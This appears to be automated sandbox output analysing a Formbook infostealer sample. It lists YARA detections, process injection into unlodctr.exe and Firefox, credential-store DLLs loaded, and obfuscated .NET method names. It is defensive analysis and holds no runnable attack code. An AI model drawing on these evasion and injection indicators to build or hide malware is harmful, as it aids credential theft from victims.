Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_02F8C670	11_2_02F8C670
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_02F8C450	11_2_02F8C450
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_02F8C447	11_2_02F8C447
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_02F92DF0	11_2_02F92DF0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_02FA9D70	11_2_02FA9D70

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: String function: 01A77E54 appears 103 times
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: String function: 01A9EA12 appears 86 times
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: String function: 01A65130 appears 58 times
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: String function: 01A1B970 appears 262 times
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: String function: 01AAF290 appears 103 times
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: String function: 03A6F290 appears 103 times
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: String function: 03A37E54 appears 99 times
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: String function: 039DB970 appears 257 times
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: String function: 03A25130 appears 58 times
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: String function: 03A5EA12 appears 86 times

One or more processes crash

Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7616 -s 1432

PE / OLE file has an invalid certificate

Source: UQO06iOMKZMPZ4A.exe

Static PE information: invalid certificate

Sample file is different than original file name gathered from version info

Source: UQO06iOMKZMPZ4A.exe, 00000000.00000002.1752688007.00000000042A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs UQO06iOMKZMPZ4A.exe
Source: UQO06iOMKZMPZ4A.exe, 00000000.00000002.1795883512.0000000007254000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs UQO06iOMKZMPZ4A.exe
Source: UQO06iOMKZMPZ4A.exe, 00000000.00000002.1746110565.00000000007AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs UQO06iOMKZMPZ4A.exe
Source: UQO06iOMKZMPZ4A.exe, 00000000.00000002.1799322819.00000000098A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs UQO06iOMKZMPZ4A.exe
Source: UQO06iOMKZMPZ4A.exe, 00000002.00000002.2062926524.00000000014B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNLODCTR.EXEj% vs UQO06iOMKZMPZ4A.exe
Source: UQO06iOMKZMPZ4A.exe, 00000002.00000002.2063166629.0000000001B1D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs UQO06iOMKZMPZ4A.exe
Source: UQO06iOMKZMPZ4A.exe	Binary or memory string: OriginalFilenamexDk.exeX vs UQO06iOMKZMPZ4A.exe

Uses 32bit PE files

Source: UQO06iOMKZMPZ4A.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 2.2.UQO06iOMKZMPZ4A.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.UQO06iOMKZMPZ4A.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.2873773132.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2062443997.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.2871535799.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.2873698812.0000000003730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2064726692.0000000001D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.2874222772.0000000003AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2065008686.0000000003330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: UQO06iOMKZMPZ4A.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.UQO06iOMKZMPZ4A.exe.3e29990.9.raw.unpack, V4uC3Iifq56IKQcfry.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.UQO06iOMKZMPZ4A.exe.3e29990.9.raw.unpack, V4uC3Iifq56IKQcfry.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.UQO06iOMKZMPZ4A.exe.25a0000.1.raw.unpack, V4uC3Iifq56IKQcfry.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.UQO06iOMKZMPZ4A.exe.25a0000.1.raw.unpack, V4uC3Iifq56IKQcfry.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 0.2.UQO06iOMKZMPZ4A.exe.98a0000.11.raw.unpack, zC5UCdSIWB58FHCwfw.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.UQO06iOMKZMPZ4A.exe.98a0000.11.raw.unpack, HVjjmekMbjAZlbxgGq.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.UQO06iOMKZMPZ4A.exe.98a0000.11.raw.unpack, HVjjmekMbjAZlbxgGq.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.UQO06iOMKZMPZ4A.exe.98a0000.11.raw.unpack, HVjjmekMbjAZlbxgGq.cs	Security API names: _0020.AddAccessRule
Source: 0.2.UQO06iOMKZMPZ4A.exe.42beec0.10.raw.unpack, HVjjmekMbjAZlbxgGq.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.UQO06iOMKZMPZ4A.exe.42beec0.10.raw.unpack, HVjjmekMbjAZlbxgGq.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.UQO06iOMKZMPZ4A.exe.42beec0.10.raw.unpack, HVjjmekMbjAZlbxgGq.cs	Security API names: _0020.AddAccessRule
Source: 0.2.UQO06iOMKZMPZ4A.exe.42beec0.10.raw.unpack, zC5UCdSIWB58FHCwfw.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: 0.2.UQO06iOMKZMPZ4A.exe.28b2ac0.8.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.UQO06iOMKZMPZ4A.exe.25d0000.2.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.UQO06iOMKZMPZ4A.exe.2691184.5.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.UQO06iOMKZMPZ4A.exe.26a1524.3.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@8/7@6/5

Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\UQO06iOMKZMPZ4A.exe.log

Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Mutant created: \Sessions\1\BaseNamedObjects\rWhIdNiRcWrZevC
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7616

Source: unknown	Process created: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe "C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe"
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process created: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe "C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe"
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7616 -s 1432
Source: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe	Process created: C:\Windows\SysWOW64\unlodctr.exe "C:\Windows\SysWOW64\unlodctr.exe"
Source: C:\Windows\SysWOW64\unlodctr.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process created: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe "C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe"	Jump to behavior
Source: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe	Process created: C:\Windows\SysWOW64\unlodctr.exe "C:\Windows\SysWOW64\unlodctr.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: loadperf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\AXXGpedivmBaBhwRBklJNWbmzUNZwuCMAoieyGUklDlnfywYEYYnjONA\DpzZIqplfZXGlyHqisknlKbWCP.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: 0.2.UQO06iOMKZMPZ4A.exe.3e29990.9.raw.unpack, V4uC3Iifq56IKQcfry.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.UQO06iOMKZMPZ4A.exe.25a0000.1.raw.unpack, V4uC3Iifq56IKQcfry.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: 0.2.UQO06iOMKZMPZ4A.exe.42beec0.10.raw.unpack, HVjjmekMbjAZlbxgGq.cs	.Net Code: en2dKs7D8E System.Reflection.Assembly.Load(byte[])
Source: 0.2.UQO06iOMKZMPZ4A.exe.98a0000.11.raw.unpack, HVjjmekMbjAZlbxgGq.cs	.Net Code: en2dKs7D8E System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 0_2_001328D5 push ss; retf	0_2_001328DC
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 0_2_00BC60A0 push ss; retf	0_2_00BC60A4
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 0_2_07567DF8 pushad ; iretd	0_2_07567DF9
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 0_2_08F3F8EB push ecx; iretd	0_2_08F3F8EC
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 0_2_09643E3A push ds; ret	0_2_09643E3B
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_0041789D push es; retf	2_2_0041789E
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_0040D0AF push esi; iretd	2_2_0040D0B0
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_0040CA39 push ebp; ret	2_2_0040CA53
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_00413B53 push esi; iretd	2_2_00413C4C
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_00413B93 push esi; iretd	2_2_00413C4C
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_0041839C push ebp; iretd	2_2_0041839E
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_00413C54 push 203B2B75h; iretd	2_2_00413C6B
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_00403500 push eax; ret	2_2_00403502
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_00405648 push esp; retf	2_2_0040564D
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_0041878A push ds; iretd	2_2_0041878B
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_019F225F pushad ; ret	2_2_019F27F9
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_019F27FA pushad ; ret	2_2_019F27F9
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_01A209AD push ecx; mov dword ptr [esp], ecx	2_2_01A209B6
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_019F283D push eax; iretd	2_2_019F2858
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_019F1368 push eax; iretd	2_2_019F1369
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_039E09AD push ecx; mov dword ptr [esp], ecx	11_2_039E09B6
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_02F95287 push ds; iretd	11_2_02F95288
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_02F990A3 push esp; retf	11_2_02F990B2
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_02F99050 push esp; retf	11_2_02F990B2
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_02F99050 pushfd ; retf 0DE4h	11_2_02F99157
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_02FA2160 push dword ptr [edi+36E8C72Ch]; retf	11_2_02FA21BD
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_02F9B145 pushad ; retf	11_2_02F9B14E
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_02F82145 push esp; retf	11_2_02F8214A
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_02F94E99 push ebp; iretd	11_2_02F94E9B

Source: 0.2.UQO06iOMKZMPZ4A.exe.3e29990.9.raw.unpack, V4uC3Iifq56IKQcfry.cs	High entropy of concatenated method names: 'JcqLcnHE8kRk7VHJhl', 'baAwnpSkPWAs4YMGxr', 'wTgrto4LNQ', 'imnL6GCB6AIFRqkhxN', 'RgtTUJcyZL', 'dHYrbjNADO', 'xiCr8b7Qs6', 'PT2rZj37UR', 'P1WruDgOtu', 'd71eKLY6YVFQv'
Source: 0.2.UQO06iOMKZMPZ4A.exe.3e29990.9.raw.unpack, vpednoN8EZgsJ4TDwx.cs	High entropy of concatenated method names: 'SvRTLtpnA', 'uJwWpedno', 'REZpgsJ4T', 'uwxys3A5Q', 'Tl3iTkB7U', 'EqRFtDP16', 'TW5lfqidm', 'wSKAUGlNW', 'LkrevaXpK', 'cwu0Op5AT'
Source: 0.2.UQO06iOMKZMPZ4A.exe.42beec0.10.raw.unpack, qptXq8PWUia3WCyO6SM.cs	High entropy of concatenated method names: 'iZVh14SPsy', 'wKWhrhgwyi', 'e9shKJ7Ft2', 'mPWhkaKfm9', 'UAuhwsJTCd', 'lJXhmyMqAA', 'NAAh2I1ZrX', 'jBHhnPL8r3', 'Dpnhy2jwSt', 'gf1hjlK8v0'
Source: 0.2.UQO06iOMKZMPZ4A.exe.42beec0.10.raw.unpack, GPsQBkJQEtPsywAcW2.cs	High entropy of concatenated method names: 'N3Pt1YlieD', 'VDEtreMu0f', 'bBxtK7U18B', 'Jkxtk58Uft', 'xeWtw9nVBg', 'dXatmmtM6D', 'Pift2IPtQo', 'rqDtnS3gh7', 'N8ityFxkcs', 'NVXtjvOX4y'
Source: 0.2.UQO06iOMKZMPZ4A.exe.42beec0.10.raw.unpack, nkZ8Q7fo3nyGU5LAd5.cs	High entropy of concatenated method names: 'YF54wUU6OI', 'Amw42a1NQK', 'ENa7BkZIZB', 'DPV7vwYAE9', 'FrP7lCGTxG', 'F4P7YJ10xE', 'i5e7b94YKR', 'Etx7c0vEyd', 'gQq7VFp68G', 'Ar17R4TDwP'
Source: 0.2.UQO06iOMKZMPZ4A.exe.42beec0.10.raw.unpack, kvf1IuVxYoZ5QcBZZe.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'XL8UNOwgIP', 'XHaUsStaI4', 'jeYUzhl892', 'mb1qHbmoIT', 'UKLqAVDtim', 'TR1qUoT9Bk', 'h6ZqqOgLPB', 'k1yKSx9IvdJBr9gFPHf'
Source: 0.2.UQO06iOMKZMPZ4A.exe.42beec0.10.raw.unpack, UCqtaR63XKApAH92bb.cs	High entropy of concatenated method names: 'nGDDWOeSlm', 'vRsD8ZXtOj', 'ENoDBLEEgS', 'M2LDvoLrmm', 'fnYDFAR04a', 'oFkDlJdTi5', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.UQO06iOMKZMPZ4A.exe.42beec0.10.raw.unpack, svJmV5t0w42ZlET6y8.cs	High entropy of concatenated method names: 'KEKAt1lT6F', 'e8fApOcxgV', 'hHjAXDHIOC', 'd3xAeVkYZR', 'TBsAZg8KuD', 'iHGAIjxvXy', 'S8QqO8fcbwAJpRwCUw', 'LQM8ivg3GqtyqdcSBF', 'mxCAArp0CL', 'TeLAqesYEq'
Source: 0.2.UQO06iOMKZMPZ4A.exe.42beec0.10.raw.unpack, y6RaThAKsVSgwbeLa4.cs	High entropy of concatenated method names: 'KM7DLx5bmW', 'GWQDGRKcdl', 'BecD7a2srX', 'JArD4il8Ki', 'U8FDPdlE80', 'HMVDtnTde3', 'rbUDp66WBP', 'UIXDaR2QVq', 'QI6DXCmyrI', 'NYvDef7SW0'
Source: 0.2.UQO06iOMKZMPZ4A.exe.42beec0.10.raw.unpack, Sc1JklPb2V7Xqa8ma4n.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BNKTFC8rxA', 'gGlTCLXl62', 'pR1TOhxyfW', 'HoVTu0waf2', 'zN5T6tqQuu', 'FAST9sTPgX', 'SWOTx4ttsJ'
Source: 0.2.UQO06iOMKZMPZ4A.exe.42beec0.10.raw.unpack, fJuHmJ0x7LMON7NNbc.cs	High entropy of concatenated method names: 'ToString', 'VejISJKsjL', 'zJNI84iDyA', 'NjkIBYc7N7', 'dFaIvXOO7e', 'Iw0IljldkU', 'VPLIYilLEk', 'vDGIbMmH0x', 'hJDIcZcTMJ', 'vPZIVLiHR2'
Source: 0.2.UQO06iOMKZMPZ4A.exe.42beec0.10.raw.unpack, H6nVeouWPrn8PxjkOt.cs	High entropy of concatenated method names: 'i1UPiigsWJ', 'bxsPGPLKmN', 'THXP4PXc4G', 'rkhPtCic1d', 'wDlPpnObLe', 'B2O469vipq', 'gog49DkPK7', 'YFr4xvyQlq', 'jXk4MHkx9h', 'jya4NjD6IN'
Source: 0.2.UQO06iOMKZMPZ4A.exe.42beec0.10.raw.unpack, uGMU2PHYPmCtC47oV2.cs	High entropy of concatenated method names: 'GVg5nSl1ED', 'dkE5yXq4oa', 'Ynr5W44Fx6', 'nUp58vGXQe', 'Tln5vawiqB', 'Car5ltECCm', 'MVM5bE93yJ', 'jXN5crQNCa', 'QYs5RmUcKy', 'Unm5S8CnJx'
